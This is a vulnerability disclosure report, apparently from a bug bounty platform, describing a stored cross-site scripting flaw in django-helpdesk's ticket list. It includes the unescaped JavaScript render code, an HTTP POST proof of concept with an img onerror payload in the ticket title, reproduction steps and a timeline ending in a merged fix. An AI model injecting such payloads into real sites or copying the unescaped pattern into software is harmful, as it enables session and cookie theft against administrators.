Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk


Reported on

Nov 3rd 2021


Stored XSS via parameter [title] when create new ticket


At the table tickets in admin, when rendering data for column [Ticket] it allows for arbitrary execution of JavaScript

Vulnerability code

                        data: "ticket",
                        render: function (data, type, row, meta) {
                            if (type === 'display') {
                                data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
                           + '. ' +
                                    row.title + '</a></div>';
                            return data

Render with [title] contain payload

<td><div class="tickettitle"><a href="/tickets/57832/">57832. "&gt;<img src="x" onerror="alert(1);"></a></div></td>

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="csrfmiddlewaretoken"

Content-Disposition: form-data; name="queue"

Content-Disposition: form-data; name="title"

"><iMg SrC="x" oNeRRor="alert(1);">
Content-Disposition: form-data; name="body"

Content-Disposition: form-data; name="priority"

Content-Disposition: form-data; name="due_date"

Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="submitter_email"

Step to Reproduct

Goto URL without login to create a new ticket:

At field [Summary of the problem] input with payload: "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when the admin load all tickets


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the django-helpdesk team within 24 hours. 7 months ago
lethanhphuc modified the report
7 months ago
We have contacted a member of the django-helpdesk team and are waiting to hear back 7 months ago
We have sent a follow up to the django-helpdesk team. We will try again in 7 days. 7 months ago
django-helpdesk/django-helpdesk maintainer validated this vulnerability 7 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
6 months ago
6 months ago



6 months ago


fix has been merged and will be released in next bugfix release. thanks!

django-helpdesk/django-helpdesk maintainer confirmed that a fix has been merged on 2c7065 6 months ago
lethanhphuc has been awarded the fix bounty
ticket_list.html#L369 has been validated
to join this conversation